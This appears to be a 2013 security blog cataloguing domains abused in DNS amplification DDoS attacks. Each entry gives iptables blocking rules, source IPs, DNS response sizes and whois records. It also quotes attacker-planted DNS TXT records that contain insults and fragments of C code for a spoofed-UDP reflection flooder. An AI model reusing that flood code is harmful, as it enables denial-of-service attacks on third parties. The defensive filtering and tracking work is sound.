"dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- HI ALL DNSssssss. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8===========================================================================================================================================================================>"


Whois


Domain ID:D51025000-LRMS
Domain Name:SLNM.INFO
Created On:16-Nov-2013 18:49:09 UTC
Last Updated On:16-Nov-2013 18:55:53 UTC
Expiration Date:16-Nov-2014 18:49:09 UTC
Sponsoring Registrar:Internet Invest, Ltd. dba Imena.ua (R503-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:DI_14171185
Registrant Name:Whois privacy protection service
Registrant Organization:Internet Invest, Ltd. dba Imena.ua
Registrant Street1:Gaidara, 50 st.
Registrant Street2:
Registrant Street3:
Registrant City:Kyiv
Registrant State/Province:
Registrant Postal Code:01033
Registrant Country:UA
Registrant Phone:+380.442010102
Registrant Phone Ext.:
Registrant FAX:+380.442010100
Registrant FAX Ext.:
Registrant Email:hostmaster@imena.ua
Admin ID:DI_14171185
Admin Name:Whois privacy protection service
Admin Organization:Internet Invest, Ltd. dba Imena.ua
Admin Street1:Gaidara, 50 st.
Admin Street2:
Admin Street3:
Admin City:Kyiv
Admin State/Province:
Admin Postal Code:01033
Admin Country:UA
Admin Phone:+380.442010102
Admin Phone Ext.:
Admin FAX:+380.442010100
Admin FAX Ext.:
Admin Email:hostmaster@imena.ua
Billing ID:DI_14171185
Billing Name:Whois privacy protection service
Billing Organization:Internet Invest, Ltd. dba Imena.ua
Billing Street1:Gaidara, 50 st.
Billing Street2:
Billing Street3:
Billing City:Kyiv
Billing State/Province:
Billing Postal Code:01033
Billing Country:UA
Billing Phone:+380.442010102
Billing Phone Ext.:
Billing FAX:+380.442010100
Billing FAX Ext.:
Billing Email:hostmaster@imena.ua
Tech ID:DI_14171185
Tech Name:Whois privacy protection service
Tech Organization:Internet Invest, Ltd. dba Imena.ua
Tech Street1:Gaidara, 50 st.
Tech Street2:
Tech Street3:
Tech City:Kyiv
Tech State/Province:
Tech Postal Code:01033
Tech Country:UA
Tech Phone:+380.442010102
Tech Phone Ext.:
Tech FAX:+380.442010100
Tech FAX Ext.:
Tech Email:hostmaster@imena.ua
Name Server:NS1.SLNM.INFO
Name Server:NS2.SLNM.INFO
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 



Friday, November 15, 2013

Domain: thebestdomainintheworld.cloudns.eu

Domain: thebestdomainintheworld.cloudns.eu

The biggest DNS response I've seen!

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x17544845 && 0x2c&0xDFDFDFDF=0x42455354 && 0x30&0xDFDFDFDF=0x444f4d41 && 0x34&0xDFDFDFDF=0x494e494e && 0x38&0xDFDFDFDF=0x54484557 && 0x3c&0xDFDFDFDF=0x4f524c44 && 0x40&0xFFDFDFDF=0x07434c4f && 0x44&0xDFDFDFDF=0x55444e53 && 0x48&0xFFDFDFFF=0x02455500" -j DROP -m comment --comment "DROP DNS Q thebestdomainintheworld.cloudns.eu"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 76 --algo bm --hex-string '|1774686562657374646f6d61696e696e746865776f726c6407636c6f75646e7302657500|' -j DROP -m comment --comment "DROP DNS Q thebestdomainintheworld.cloudns.eu"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


223.130.85.119 ; Korea, Republic of ; AS46010 SAMJUNG DATA SERVICE

Name server:


;; ANSWER SECTION:
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns1.cloudns.net.
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns2.cloudns.net.
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns4.cloudns.net.
thebestdomainintheworld.cloudns.eu. 3600 IN NS ns3.cloudns.net.


Response:


A 1345
NS 4
SOA 1
Rsize 21683

http://pastebin.com/9K5Re6Sf

Whois


%
% The EURid WHOIS service on port 43 (textual whois) never
% discloses any information concerning the registrant.
% Registrant and onsite contact information can be obtained through use of the
% webbased whois service available from the EURid website www.eurid.eu
%
% WHOIS thebestdomainintheworld.cloudns.eu
-7: Invalid pattern



Thursday, November 14, 2013

Domain: x.mpnp.info

Domain: x.mpnp.info

Also seeing:

g.mpnp.info
j.mpnp.info
a.mpnp.info
z.mpnp.info


Another domain with a personalized message! I feel so special.

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:

Updated the below rule to match on any single char subdomain .mpnp.info:

There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x0100044d && 0x2c&0xDFDFDFFF=0x504e5004 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|046d706e7004696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:

mpnp.info.              86400   IN      NS      ns2.mpnp.info.
mpnp.info.              86400   IN      NS      ns1.mpnp.info.

ns1.mpnp.info.          86400   IN      A       149.3.143.130
ns2.mpnp.info.          77502   IN      A       149.3.143.130

Response:


TXT 1
Rsize 3948


"void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;structiphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id =                    htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = s rcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() %65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =---- " ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.       com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                     nsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">""dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- QQ DDOS-GUARD. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8========================================================================                                                   ===================================================================================================>"


Well interesting...

Whois


Domain ID:D51006486-LRMS
Domain Name:MPNP.INFO
Created On:13-Nov-2013 16:04:31 UTC
Last Updated On:13-Nov-2013 16:22:32 UTC
Expiration Date:13-Nov-2014 16:04:31 UTC
Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:ID#10760, PO Box 16
Registrant Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Registrant Street3:
Registrant City:Nobby Beach
Registrant State/Province:
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:contact@privacyprotect.org
Admin ID:PP-SP-001
Admin Name:Domain Admin
Admin Organization:PrivacyProtect.org
Admin Street1:ID#10760, PO Box 16
Admin Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Admin Street3:
Admin City:Nobby Beach
Admin State/Province:
Admin Postal Code:QLD 4218
Admin Country:AU
Admin Phone:+45.36946676
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:contact@privacyprotect.org
Billing ID:PP-SP-001
Billing Name:Domain Admin
Billing Organization:PrivacyProtect.org
Billing Street1:ID#10760, PO Box 16
Billing Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Billing Street3:
Billing City:Nobby Beach
Billing State/Province:
Billing Postal Code:QLD 4218
Billing Country:AU
Billing Phone:+45.36946676
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:contact@privacyprotect.org
Tech ID:PP-SP-001
Tech Name:Domain Admin
Tech Organization:PrivacyProtect.org
Tech Street1:ID#10760, PO Box 16
Tech Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Tech Street3:
Tech City:Nobby Beach
Tech State/Province:
Tech Postal Code:QLD 4218
Tech Country:AU
Tech Phone:+45.36946676
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:contact@privacyprotect.org
Name Server:NS1.MPNP.INFO
Name Server:NS2.MPNP.INFO
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server



Domain: lrc-pipec.com

Domain: lrc-pipec.com

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x094c5243 && 0x2c&0xFFDFDFDF=0x2d504950 && 0x30&0xDFDFFFDF=0x45430343 && 0x34&0xDFDFFF00=0x4f4d0000" -j DROP -m comment --comment "DROP DNS Q lrc-pipec.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 55 --algo bm --hex-string '|096c72632d706970656303636f6d00|' -j DROP -m comment --comment "DROP DNS Q lrc-pipec.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


89.248.172.203

Name server:


;; ANSWER SECTION:
lrc-pipec.com. 10800 IN NS b.dns.gandi.net.
lrc-pipec.com. 10800 IN NS c.dns.gandi.net.
lrc-pipec.com. 10800 IN NS a.dns.gandi.net.


Response:


A 242
MX 2
NS 3
SOA 1
Rsize 4041


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: LRC-PIPEC.COM
Registrar: GANDI SAS
Whois Server: whois.gandi.net
Referral URL: http://www.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Status: clientTransferProhibited
Updated Date: 07-nov-2013
Creation Date: 07-nov-2013
Expiration Date: 07-nov-2014

>>> Last update of whois database: Fri, 15 Nov 2013 00:22:49 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: lrc-pipec.com
Registry Domain ID: 1834550409_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-07T19:11:08Z
Creation Date: 2013-11-07T16:12:26Z
Registrar Registration Expiration Date: 2014-11-07T15:12:26Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Viktor BARINOV
Registrant Organization:
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province:
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 105e9ac19694fce132c4aacf57a58490-1806369@contact.gandi.net
Registry Admin ID:
Admin Name: Viktor BARINOV
Admin Organization:
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province:
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 105e9ac19694fce132c4aacf57a58490-1806369@contact.gandi.net
Registry Tech ID:
Tech Name: Viktor BARINOV
Tech Organization:
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province:
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 105e9ac19694fce132c4aacf57a58490-1806369@contact.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-15T00:23:17Z <<<

Reseller Email:
Reseller URL:

Personal data access and use are governed by French law, any use for
the purpose of unsolicited mass commercial advertising as well as any
mass or automated inquiries (for any intent other than the
registration or modification of a domain name) are strictly forbidden.
Copy of whole or part of our database without Gandi's endorsement is
strictly forbidden.
The owner of a domain is the person specified as "Registrant Name" for
a natural person and "Registrant Organization" for a legal person.
Domain ownership disputes should be settled using ICANN's Uniform
Dispute Resolution Policy: http://www.icann.org/en/help/dndr#udrp



Monday, November 11, 2013

Domain: cheatsharez.com

Domain: cheatsharez.com

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

*Fixed typo in rule

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0b434845 && 0x2c&0xDFDFDFDF=0x41545348 && 0x30&0xDFDFDFDF=0x4152455a && 0x34&0xFFDFDFDF=0x03434f4d && 0x38&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q cheatsharez.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 57 --algo bm --hex-string '|0B636865617473686172657a03636f6d00|' -j DROP -m comment --comment "DROP DNS Q cheatsharez.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


94.102.49.37

Name server:


;; ANSWER SECTION:
cheatsharez.com.        17508   IN      NS      ns2.cheatsharez.com.
cheatsharez.com.        17508   IN      NS      ns1.cheatsharez.com.

;; ADDITIONAL SECTION:
ns2.cheatsharez.com.    17508   IN      A       89.248.168.94
ns1.cheatsharez.com.    17508   IN      A       89.248.168.94



Response:


A 242
NS 2
SOA 1
Rsize 3969


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: CHEATSHAREZ.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: NS1.CHEATSHAREZ.COM
Name Server: NS2.CHEATSHAREZ.COM
Status: clientTransferProhibited
Updated Date: 11-nov-2013
Creation Date: 11-nov-2013
Expiration Date: 11-nov-2014

>>> Last update of whois database: Tue, 12 Nov 2013 06:48:31 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.


Domain Name: CHEATSHAREZ.COM
Creation Date: 2013-11-11 16:29:00Z
Registrar Registration Expiration Date: 2014-11-11 16:29:00Z
Registrar: ENOM, INC.
Reseller: NAMECHEAP.COM
Registrant Name: WHOISGUARD PROTECTED
Registrant Organization: WHOISGUARD, INC.
Registrant Street: P.O. BOX 0823-03411
Registrant City: PANAMA
Registrant State/Province: PANAMA
Registrant Postal Code: NA
Registrant Country: PA
Admin Name: WHOISGUARD PROTECTED
Admin Organization: WHOISGUARD, INC.
Admin Street: P.O. BOX 0823-03411
Admin City: PANAMA
Admin State/Province: PANAMA
Admin Postal Code: NA
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 33A60AC6876943FBB733252AE9E1386D.PROTECT@WHOISGUARD.COM
Tech Name: WHOISGUARD PROTECTED
Tech Organization: WHOISGUARD, INC.
Tech Street: P.O. BOX 0823-03411
Tech City: PANAMA
Tech State/Province: PANAMA
Tech Postal Code: NA
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 33A60AC6876943FBB733252AE9E1386D.PROTECT@WHOISGUARD.COM
Name Server: NS1.CHEATSHAREZ.COM
Name Server: NS2.CHEATSHAREZ.COM


We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002



Sunday, November 10, 2013

Domain: hccforums.nl

Domain: hccforums.nl

Attack using a legit domain. Have not seen any attacks yet. Only scanning.

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x09484343 && 0x2c&0xDFDFDFDF=0x464f5255 && 0x30&0xDFDFFFDF=0x4d53024e && 0x34&0xDFFF00FF=0x4c0000ff" -j DROP -m comment --comment "DROP DNS Q ANY hccforums.nl"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 56 --algo bm --hex-string '|09686363666f72756d73026e6c0000ff|' -j DROP -m comment --comment "DROP DNS Q hccforums.nl"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


93.174.93.139 - AS29073 Ecatel Network

Name server:


;; ANSWER SECTION:
hccforums.nl. 3600 IN NS ns1.hobby.nl.
hccforums.nl. 3600 IN NS ns2.hobby.nl.
hccforums.nl. 3600 IN NS ns3.hobby.nl.


Response:


A 13
AAAA 2
DNSKEY 3
MX 5
NS 9
NSEC3PARAM 2
RRSIG 7
SOA 2
Rsize 3444


Whois


Domain name: hccforums.nl
Status: active

Registrar:
HCC
Jansweg 38
2011KN HAARLEM
Netherlands

DNSSEC: yes

Domain nameservers:
ns2.hobby.nl
ns3.hobby.nl
ns1.hobby.nl

Record maintained by: NL Domain Registry

Copyright notice
No part of this publication may be reproduced, published, stored in a
retrieval system, or transmitted, in any form or by any means,
electronic, mechanical, recording, or otherwise, without prior
permission of the Foundation for Internet Domain Registration in the
Netherlands (SIDN).
These restrictions apply equally to registrars, except in that
reproductions and publications are permitted insofar as they are
reasonable, necessary and solely in the context of the registration
activities referred to in the General Terms and Conditions for .nl
Registrars.
Any use of this material for advertising, targeting commercial offers or
similar activities is explicitly forbidden and liable to result in legal
action. Anyone who is aware or suspects that such activities are taking
place is asked to inform the Foundation for Internet Domain Registration
in the Netherlands.
(c) The Foundation for Internet Domain Registration in the Netherlands
(SIDN) Dutch Copyright Act, protection of authors' rights (Section 10,
subsection 1, clause 1).



Saturday, November 9, 2013

Domain: siska1.com

Domain: siska1.com

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x06534953 && 0x2c&0xDFDFFFFF=0x4b413103 && 0x30&0xDFDFDFFF=0x434f4d00" -j DROP -m comment --comment "DROP DNS Q siska1.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 52 --algo bm --hex-string '|067369736b613103636f6d00|' -j DROP -m comment --comment "DROP DNS Q siska1.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


80.82.65.206 - AS29073 Ecatel Network

Name server:


;; ANSWER SECTION:
siska1.com. 9267 IN NS a.dns.gandi.net.
siska1.com. 9267 IN NS c.dns.gandi.net.
siska1.com. 9267 IN NS b.dns.gandi.net.


Response:


A 258
MX 2
NS 3
SOA 1
Rsize 4294


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: SISKA1.COM
Registrar: GANDI SAS
Whois Server: whois.gandi.net
Referral URL: http://www.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Status: clientTransferProhibited
Updated Date: 09-nov-2013
Creation Date: 09-nov-2013
Expiration Date: 09-nov-2014

>>> Last update of whois database: Sun, 10 Nov 2013 01:00:09 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: siska1.com
Registry Domain ID: 1834806056_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-10T00:38:25Z
Creation Date: 2013-11-09T17:00:29Z
Registrar Registration Expiration Date: 2014-11-09T16:00:29Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Kapa JOHNS
Registrant Organization:
Registrant Street: sherbakoskay 45/6
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 127027
Registrant Country: RU
Registrant Phone: +7.9257227864
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: purp.level@mail.ru
Registry Admin ID:
Admin Name: Kapa JOHNS
Admin Organization:
Admin Street: sherbakoskay 45/6
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 127027
Admin Country: RU
Admin Phone: +7.9257227864
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: purp.level@mail.ru
Registry Tech ID:
Tech Name: Kapa JOHNS
Tech Organization:
Tech Street: sherbakoskay 45/6
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 127027
Tech Country: RU
Tech Phone: +7.9257227864
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: purp.level@mail.ru
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
